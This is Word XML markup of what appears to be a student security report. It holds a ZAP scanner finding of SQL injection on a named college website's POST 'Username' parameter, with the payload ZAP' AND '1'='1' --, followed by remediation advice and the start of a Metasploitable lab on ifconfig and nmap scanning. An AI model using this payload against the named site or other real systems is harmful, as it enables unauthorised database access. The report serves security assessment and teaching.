            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="009B15A7" w:rsidRPr="004750F9" w:rsidRDefault="00C2655D" w:rsidP="009B15A7">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId22" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidR="009B15A7" w:rsidRPr="004750F9">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                  <w:color w:val="000000" w:themeColor="text1"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>https://www.dcrustedp.in/con8/insertstudent_complete_remain.php</w:t>
              </w:r>
            </w:hyperlink>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Method</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POST</w:t>
            </w:r>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Parameter</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Username</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004750F9" w:rsidRPr="004750F9" w:rsidTr="001E33B8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1389" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="600" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="60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Attack</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ZAP' AND '1'='1' --</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004750F9" w:rsidRPr="004750F9" w:rsidTr="001E33B8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1389"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Instances</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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004750F9" w:rsidRPr="004750F9" w:rsidTr="001E33B8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1389"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Solution</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pStyle w:val="NormalWeb"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004750F9">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Do not trust client side input, even if there is client side validation in place.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009B15A7" w:rsidRPr="004750F9" w:rsidRDefault="009B15A7" w:rsidP="009B15A7">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004750F9">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>In general, type check all data on the server side.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009B15A7" w:rsidRPr="004750F9" w:rsidRDefault="009B15A7" w:rsidP="009B15A7">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004750F9">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009B15A7" w:rsidRPr="004750F9" w:rsidRDefault="009B15A7" w:rsidP="009B15A7">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004750F9">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009B15A7" w:rsidRPr="004750F9" w:rsidRDefault="009B15A7" w:rsidP="009B15A7">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004750F9">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>If database Stored Procedures can be used, use them.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009B15A7" w:rsidRPr="004750F9" w:rsidRDefault="009B15A7" w:rsidP="009B15A7">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004750F9">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality!</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009B15A7" w:rsidRPr="004750F9" w:rsidRDefault="009B15A7" w:rsidP="009B15A7">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004750F9">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Do not create dynamic SQL queries using simple string concatenation.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009B15A7" w:rsidRPr="004750F9" w:rsidRDefault="009B15A7" w:rsidP="009B15A7">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004750F9">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Escape all data received from the client.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009B15A7" w:rsidRPr="004750F9" w:rsidRDefault="009B15A7" w:rsidP="009B15A7">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004750F9">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009B15A7" w:rsidRPr="004750F9" w:rsidRDefault="009B15A7" w:rsidP="009B15A7">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004750F9">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Apply the principle of least privilege by using the least privileged database user possible.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009B15A7" w:rsidRPr="004750F9" w:rsidRDefault="009B15A7" w:rsidP="009B15A7">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004750F9">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009B15A7" w:rsidRPr="004750F9" w:rsidRDefault="009B15A7" w:rsidP="009B15A7">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004750F9">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Grant the minimum database access that is necessary for the application.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004750F9" w:rsidRPr="004750F9" w:rsidTr="001E33B8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1389"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Other information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3561" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8"/>
            <w:tcMar>
              <w:top w:w="45" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:bottom w:w="45" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="009B15A7" w:rsidRPr="004750F9" w:rsidRDefault="009B15A7" w:rsidP="009B15A7">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004750F9">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>The original page results were successfully replicated using the expression [10-2] as the parameter value</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009B15A7" w:rsidRPr="004750F9" w:rsidRDefault="009B15A7" w:rsidP="009B15A7">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004750F9">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>The parameter value being modified was stripped from the HTML output for the purposes of the comparison</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004750F9" w:rsidRPr="004750F9" w:rsidTr="001E33B8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4967" w:type="pct"/>
            <w:gridSpan w:val="2"/>
            <w:tcMar>
              <w:top w:w="45" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:bottom w:w="45" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="009B15A7" w:rsidRPr="004750F9" w:rsidRDefault="009B15A7" w:rsidP="009B15A7">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004750F9" w:rsidRPr="004750F9" w:rsidTr="001E33B8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1389" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8"/>
            <w:tcMar>
              <w:top w:w="45" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:bottom w:w="45" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="009B15A7" w:rsidRPr="004750F9" w:rsidRDefault="009B15A7" w:rsidP="009B15A7">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004750F9">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Reference</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3561" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8"/>
            <w:tcMar>
              <w:top w:w="45" w:type="dxa"/>
              <w:left w:w="60" w:type="dxa"/>
              <w:bottom w:w="45" w:type="dxa"/>
              <w:right w:w="60" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="009B15A7" w:rsidRPr="004750F9" w:rsidRDefault="00C2655D" w:rsidP="009B15A7">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId23" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidR="009B15A7" w:rsidRPr="004750F9">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="000000" w:themeColor="text1"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00785C5C" w:rsidRPr="004750F9" w:rsidRDefault="00785C5C" w:rsidP="00D348F6">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Metasploit Machine Vulnerabilities and Scanning and Hacking</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62C19" w:rsidRPr="004750F9" w:rsidRDefault="00E62C19" w:rsidP="00D348F6">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D348F6" w:rsidRPr="004750F9" w:rsidRDefault="00D348F6" w:rsidP="00785C5C">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Login to metaspolit and extract ip address</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00785C5C" w:rsidRPr="004750F9" w:rsidRDefault="00785C5C" w:rsidP="00785C5C">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D348F6" w:rsidRPr="004750F9" w:rsidRDefault="00D348F6" w:rsidP="00D348F6">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46E12FA2" wp14:editId="47ED30F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D348F6" w:rsidRPr="004750F9" w:rsidRDefault="00D348F6" w:rsidP="00D348F6">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:b w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:b w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D348F6" w:rsidRPr="004750F9" w:rsidRDefault="00D348F6" w:rsidP="00D348F6">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:b w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>install and start metasploitable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D348F6" w:rsidRPr="004750F9" w:rsidRDefault="00D348F6" w:rsidP="00D348F6">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:b w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D348F6" w:rsidRPr="004750F9" w:rsidRDefault="00D348F6" w:rsidP="00D348F6">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:b w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Use ifconfig to find ip addresses </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00785C5C" w:rsidRPr="004750F9" w:rsidRDefault="00D348F6" w:rsidP="00D348F6">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:b w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00785C5C" w:rsidRPr="004750F9" w:rsidRDefault="00785C5C" w:rsidP="00D348F6">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00785C5C" w:rsidRPr="004750F9" w:rsidRDefault="00785C5C" w:rsidP="00D348F6">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00785C5C" w:rsidRPr="004750F9" w:rsidRDefault="00785C5C" w:rsidP="00D348F6">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E62C19" w:rsidRPr="004750F9" w:rsidRDefault="00E62C19" w:rsidP="00D348F6">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D348F6" w:rsidRPr="004750F9" w:rsidRDefault="00D348F6" w:rsidP="00785C5C">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Do nmap scanning on the IP, Extract Open port and Version Details</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D348F6" w:rsidRPr="004750F9" w:rsidRDefault="00D348F6" w:rsidP="00D348F6">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Step 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D348F6" w:rsidRPr="004750F9" w:rsidRDefault="00D348F6" w:rsidP="00D348F6">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
